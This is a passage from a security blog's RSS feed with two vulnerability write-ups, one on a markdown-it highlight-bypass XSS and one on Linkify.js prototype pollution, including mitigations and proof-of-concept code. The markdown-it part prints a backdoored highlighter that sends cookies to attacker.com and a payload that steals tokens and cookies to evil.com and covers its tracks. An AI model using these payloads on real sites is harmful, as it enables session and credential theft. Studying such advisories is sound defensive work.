localStorage.setItem(&apos;xss_payload&apos;, &apos;document.body.innerHTML=&quot;&amp;lt;h1&amp;gt;PWNED&amp;lt;/h1&amp;gt;&quot;&apos;);

// Stage 2: Trigger on user interaction
document.addEventListener(&apos;click&apos;, () =&amp;gt; {
    eval(localStorage.getItem(&apos;xss_payload&apos;));
});
&amp;lt;/script&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Bypassing Traditional Protections&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy (CSP)&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Many CSP implementations allow inline event handlers&lt;/li&gt;
&lt;li&gt;The vulnerability occurs during markdown processing, before CSP evaluation&lt;/li&gt;
&lt;li&gt;Malicious content appears as &quot;legitimate&quot; markdown output&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Sanitization&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Traditional HTML sanitizers run &lt;strong&gt;after&lt;/strong&gt; markdown processing&lt;/li&gt;
&lt;li&gt;The vulnerability bypasses markdown-it&apos;s internal sanitization&lt;/li&gt;
&lt;li&gt;Malicious content looks like valid HTML structure&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Server-Side Rendering&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;XSS executes during client-side hydration&lt;/li&gt;
&lt;li&gt;Server logs show &quot;legitimate&quot; markdown processing&lt;/li&gt;
&lt;li&gt;Difficult to detect through traditional monitoring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Exploitation Techniques&lt;/h2&gt;
&lt;h3&gt;Stored XSS via Documentation Systems&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Vulnerable documentation platform
app.post(&apos;/docs/create&apos;, (req, res) =&amp;gt; {
    const { content, title } = req.body;
    
    // Process markdown with vulnerable highlight function
    const html = md.render(content);
    
    // Store in database - becomes persistent XSS
    database.docs.insert({
        title,
        content: html,  // Stored XSS payload
        created: new Date()
    });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Reflected XSS via Live Previews&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Live markdown preview endpoint (vulnerable)
app.get(&apos;/preview&apos;, (req, res) =&amp;gt; {
    const markdown = req.query.content;
    
    // Real-time processing enables reflected XSS
    const preview = md.render(markdown);
    
    res.json({ preview });  // XSS in response
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Supply Chain Attacks&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Malicious highlight function in compromised package
const compromisedHighlighter = (code, lang) =&amp;gt; {
    // Legitimate highlighting
    const result = actualHighlight(code, lang);
    
    // Inject backdoor when specific conditions met
    if (code.includes(&apos;SECRET_TRIGGER&apos;)) {
        return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${result}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;fetch(&apos;//attacker.com/harvest?data=&apos;+document.cookie)&quot;&amp;gt;`;
    }
    
    return result;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Advanced Payload Construction&lt;/h3&gt;
&lt;h4&gt;Multi-Vector Attack&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const multiVectorPayload = `
\`\`\`html
&amp;lt;pre id=&quot;legit&quot;&amp;gt;&amp;lt;code&amp;gt;function example() { return 42; }&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;style&amp;gt;
#legit { display: none; }
body::after { 
  content: &quot;Loading...&quot;; 
  position: fixed; 
  top: 50%; 
  left: 50%; 
  transform: translate(-50%, -50%);
  font-size: 24px;
}
&amp;lt;/style&amp;gt;
&amp;lt;script&amp;gt;
// Delayed execution to avoid detection
setTimeout(() =&amp;gt; {
  // Credential harvesting
  const token = localStorage.getItem(&apos;auth_token&apos;);
  const session = document.cookie;
  
  // Data exfiltration
  fetch(&apos;//evil.com/collect&apos;, {
    method: &apos;POST&apos;,
    body: JSON.stringify({ token, session, url: location.href }),
    headers: { &apos;Content-Type&apos;: &apos;application/json&apos; }
  });
  
  // Cover tracks
  document.querySelector(&apos;style&apos;).remove();
  document.getElementById(&apos;legit&apos;).style.display = &apos;block&apos;;
}, 2000);
&amp;lt;/script&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;h3&gt;Immediate Actions&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Upgrade markdown-it to patched version&lt;/strong&gt; (not yet available)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npm install markdown-it@latest
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Temporary Workarounds&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Safe highlight function wrapper
function safeHighlight(originalHighlight) {
  return function(str, lang, attrs) {
    const result = originalHighlight(str, lang, attrs);
    
    // Never return content starting with &amp;lt;pre
    if (typeof result === &apos;string&apos; &amp;amp;&amp;amp; result.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
      // Force safe rendering path
      return null;
    }
    
    return result;
  };
}

// Usage
const md = new MarkdownIt({
  highlight: safeHighlight(myHighlightFunction)
});
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Secure Implementation Patterns&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Output Validation&lt;/strong&gt; (simple validatons to make a point)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function validateHighlightOutput(output, originalContent) {
  // Reject any output that starts with HTML tags
  if (/&amp;lt;[^&amp;gt;]+&amp;gt;/.test(output.trim().substring(0, 10))) {
    throw new Error(&apos;Highlight function returned unsafe HTML&apos;);
  }
  
  // Ensure output doesn&apos;t contain script tags or event handlers
  const dangerousPatterns = [
    /&amp;lt;script\b[^&amp;lt;]*(?:(?!&amp;lt;\/script&amp;gt;)&amp;lt;[^&amp;lt;]*)*&amp;lt;\/script&amp;gt;/gi,
    /\bon\w+\s*=/gi,
    /javascript:/gi,
    /data:text\/html/gi
  ];
  
  for (const pattern of dangerousPatterns) {
    if (pattern.test(output)) {
      throw new Error(&apos;Highlight function returned malicious content&apos;);
    }
  }
  
  return output;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Strict CSP for markdown content
app.use((req, res, next) =&amp;gt; {
  res.setHeader(&apos;Content-Security-Policy&apos;, [
    &quot;default-src &apos;self&apos;&quot;,
    &quot;script-src &apos;self&apos; &apos;unsafe-inline&apos;&quot;,  // Only if absolutely necessary
    &quot;object-src &apos;none&apos;&quot;,
    &quot;style-src &apos;self&apos; &apos;unsafe-inline&apos;&quot;,   // For syntax highlighting
    &quot;img-src &apos;self&apos; data: https:&quot;,
    &quot;connect-src &apos;self&apos;&quot;
  ].join(&apos;; &apos;));
  next();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;HTML Sanitization&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import DOMPurify from &apos;dompurify&apos;;

// Always sanitize markdown output
function renderSafeMarkdown(content, options) {
  const html = md.render(content, options);
  
  // Sanitize the final HTML output
  return DOMPurify.sanitize(html, {
    ALLOWED_TAGS: [&apos;p&apos;, &apos;br&apos;, &apos;strong&apos;, &apos;em&apos;, &apos;code&apos;, &apos;pre&apos;, &apos;h1&apos;, &apos;h2&apos;, &apos;h3&apos;],
    ALLOWED_ATTR: [&apos;class&apos;],
    FORBID_SCRIPT: true,
    FORBID_TAGS: [&apos;script&apos;, &apos;object&apos;, &apos;embed&apos;, &apos;link&apos;],
    FORBID_ATTR: [&apos;onerror&apos;, &apos;onclick&apos;, &apos;onload&apos;, &apos;onmouseover&apos;]
  });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This vulnerability demonstrates the critical importance of output validation in markdown processing libraries. The bypass mechanism in markdown-it&apos;s fence rendering creates a significant attack surface that affects any application using custom highlight functions.&lt;/p&gt;
&lt;p&gt;The impact is particularly severe given markdown-it&apos;s widespread adoption in documentation platforms, content management systems, and developer tools. Organizations should prioritize upgrading to patched versions (hopefully available soon) and implementing additional security layers.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/markdown-it/markdown-it&quot;&gt;Markdown-it GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting&quot;&gt;MDN: Cross-site scripting (XSS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html&quot;&gt;OWASP XSS Prevention Cheat Sheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-7969&quot;&gt;CVE-2025-7969 Details&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/fito&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;Exploit PoC&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;import MarkdownIt from &apos;markdown-it&apos;;

// Vulnerable highlight function
const highlight = (str, lang) =&amp;gt; {
  if (str.trim().startsWith(&apos;&amp;lt;pre&apos;)) {
    return str;  // This enables the bypass
  }
  return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${str}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;`;
};

const md = new MarkdownIt({ highlight });

const payload = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;console.log(&quot;Hello&quot;);&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;alert(&apos;XSS!&apos;)&quot;&amp;gt;
\`\`\`
`;

console.log(md.render(payload));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result: XSS payload executes when the generated HTML is rendered in browser.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Stored/Reflected/DOM-based XSS&lt;/strong&gt; in any application using vulnerable markdown-it&lt;/li&gt;
&lt;li&gt;Affects documentation platforms, CMSs, and developer tools&lt;/li&gt;
&lt;li&gt;CVE reserved: &lt;strong&gt;CVE-2025-7969&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
</content:encoded></item><item><title>CVE-2025-8101: Linkify.js Prototype Pollution &amp; XSS - Charly</title><link>http://caverav.cl/posts/linkify-xss/linkify-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/linkify-xss/linkify-xss/</guid><pubDate>Sat, 26 Jul 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Linkify.js &lt;code&gt;4.3.1&lt;/code&gt; contains a prototype pollution vulnerability (CVE-2025-8101) that enables remote code execution through XSS. This post provides a technical deep dive into the vulnerability, exploitation techniques, and real-world impact scenarios.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Core Vulnerability&lt;/h3&gt;
&lt;p&gt;At its core, the vulnerability exists in the library&apos;s attribute assignment logic. Linkify.js uses a custom &lt;code&gt;assign()&lt;/code&gt; helper function that naively copies properties without proper validation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default function assign(target, properties) {
  for (const key in properties) {
    target[key] = properties[key];  // Prototype pollution vector
  }
  return target;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Prototype Pollution Mechanics&lt;/h3&gt;
&lt;p&gt;When processing link attributes, the library accepts user-controlled input through the &lt;code&gt;options.attributes&lt;/code&gt; object. By providing a specially crafted object with a &lt;code&gt;__proto__&lt;/code&gt; property, an attacker can pollute the prototype of the base &lt;code&gt;Object&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const maliciousOptions = {
  attributes: {
    __proto__: { 
      // These properties will be inherited by all objects
      onclick: &apos;alert(&quot;XSS&quot;)&apos;,
      onmouseover: &apos;alert(&quot;XSS&quot;)&apos;,
      // ... other malicious attributes
    }
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The DOM XSS Chain&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Initialization Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Application initializes Linkify with user-controlled options&lt;/li&gt;
&lt;li&gt;Malicious attributes are merged into the prototype chain&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DOM Injection&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When links are rendered, they inherit the polluted prototype&lt;/li&gt;
&lt;li&gt;Event handlers are automatically bound through the prototype chain&lt;/li&gt;
&lt;li&gt;No direct assignment of malicious code is visible in the DOM&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Advanced Exploitation Vectors&lt;/h3&gt;
&lt;h4&gt;Stored XSS via API Endpoints&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Backend API handler (vulnerable)
app.post(&apos;/api/comment&apos;, (req, res) =&amp;gt; {
  const { content } = req.body;
  // Process content with vulnerable Linkify version
  const processed = linkifyHtml(content, req.user.preferences);
  saveToDatabase(processed);  // Stored XSS
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Reflected XSS via URL Parameters&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Client-side rendering (vulnerable)
const params = new URLSearchParams(window.location.search);
const userContent = params.get(&apos;search&apos;);
document.body.innerHTML = linkifyHtml(userContent);
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Bypassing Traditional Protections&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy (CSP)&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Many CSP implementations allow &lt;code&gt;&apos;unsafe-inline&apos;&lt;/code&gt; for event handlers&lt;/li&gt;
&lt;li&gt;Even with strict CSP, &lt;code&gt;javascript:&lt;/code&gt; URIs might be allowed for navigation&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Sanitization&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Most HTML sanitizers don&apos;t catch prototype pollution&lt;/li&gt;
&lt;li&gt;The attack happens at the JavaScript level, not in the HTML&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;h3&gt;Immediate Actions&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Upgrade to Linkify.js 4.3.2+&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npm install linkifyjs@latest
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Temporary Workarounds&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Safe wrapper function
function safeLinkify(text, options = {}) {
  // Remove __proto__ and constructor from options
  const safeOptions = JSON.parse(JSON.stringify(options));
  return linkifyHtml(text, safeOptions);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Secure Implementation Patterns&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Validation&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function validateAttributes(attrs) {
  const safeAttrs = {};
  const ALLOWED_ATTRS = [&apos;class&apos;, &apos;target&apos;, &apos;rel&apos;, &apos;title&apos;];
  
  for (const [key, value] of Object.entries(attrs)) {
    if (ALLOWED_ATTRS.includes(key)) {
      safeAttrs[key] = value;
    }
  }
  return safeAttrs;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deep Object Freezing&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Object.freeze()&lt;/code&gt; is a powerful JavaScript method that prevents modifications to an object. When applied, it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Makes the object immutable (can&apos;t add, remove, or modify properties)&lt;/li&gt;
&lt;li&gt;Prevents changes to property descriptors&lt;/li&gt;
&lt;li&gt;Makes the object&apos;s prototype immutable&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;// Basic usage
const config = { apiKey: &apos;123&apos; };
Object.freeze(config);

config.apiKey = &apos;hacked&apos;; // Fails silently in non-strict mode
delete config.apiKey;     // Fails
config.newProp = &apos;test&apos;;  // Fails
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For nested objects, we need a recursive solution:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function deepFreeze(object) {
  // Freeze the object itself
  Object.freeze(object);
  
  // Handle null/undefined and non-objects
  if (object === null || typeof object !== &apos;object&apos;) {
    return object;
  }
  
  // Freeze all properties
  Object.getOwnPropertyNames(object).forEach(prop =&amp;gt; {
    const value = object[prop];
    // Recursively freeze objects and functions, but skip already frozen objects
    if (!Object.isFrozen(value) &amp;amp;&amp;amp; (value instanceof Object)) {
      deepFreeze(value);
    }
  });
  
  return object;
}

// Usage in Linkify.js context
const safeOptions = deepFreeze({
  attributes: {
    // ... your attributes
  }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This pattern is particularly effective against prototype pollution because:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It prevents modifications to the prototype chain&lt;/li&gt;
&lt;li&gt;It makes the object&apos;s structure immutable&lt;/li&gt;
&lt;li&gt;It fails loudly in strict mode when someone tries to modify it&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For more in-depth information, refer to the &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze&quot;&gt;MDN documentation on Object.freeze()&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Important Note&lt;/strong&gt;: While &lt;code&gt;Object.freeze()&lt;/code&gt; is powerful, it only provides shallow immutability by default. Always use deep freezing for complex objects to ensure complete protection.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Detection &amp;amp; Response&lt;/h2&gt;
&lt;h3&gt;Identifying Vulnerable Implementations&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Detection script
const isVulnerable = (() =&amp;gt; {
  try {
    const test = {};
    linkifyHtml(&apos;test&apos;, {
      attributes: {
        __proto__: { test: 1 }
      }
    });
    return ({}).test === 1;
  } catch (e) {
    return false;
  }
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Log Analysis Patterns&lt;/h3&gt;
&lt;p&gt;Look for suspicious patterns in logs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Unusual &lt;code&gt;__proto__&lt;/code&gt; properties in attribute objects&lt;/li&gt;
&lt;li&gt;Unexpected event handlers in linkify operations&lt;/li&gt;
&lt;li&gt;Multiple failed attempts with different attribute combinations&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This vulnerability demonstrates the dangers of prototype pollution in JavaScript libraries and the importance of proper input validation. The impact is particularly severe given Linkify.js&apos;s widespread use in content management systems, forums, and social platforms.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/nfrasser/linkifyjs&quot;&gt;Linkify.js GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto&quot;&gt;MDN: Object.prototype.&lt;strong&gt;proto&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://portswigger.net/web-security/prototype-pollution&quot;&gt;PortSwigger: Prototype Pollution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-8101&quot;&gt;CVE-2025-8101 Details&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/charly&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;p&gt;When Linkify later sets link attributes, it blindly copies all enumerable keys, including inherited ones:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (const attr in attributes) {
  element.setAttribute(attr, attributes[attr]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h2&gt;Exploit PoC&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;import linkifyHtml from &apos;linkify-html&apos;;

const opts = {
  attributes: {
    __proto__: {
      onclick: &quot;alert(&apos;XSS via prototype pollution&apos;)&quot;
    }
  }
};

console.log(
  linkifyHtml(&apos;victim.com&apos;, opts)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result: every generated &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tag gets an &lt;code&gt;onclick&lt;/code&gt; that pops XSS.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Stored/Reflected XSS&lt;/strong&gt; in any app using vulnerable Linkify.js&lt;/li&gt;
&lt;li&gt;Affects all platforms (browser/Node.js)&lt;/li&gt;
&lt;li&gt;CVE reserved: &lt;strong&gt;CVE-2025-8101&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
</content:encoded></item></channel></rss>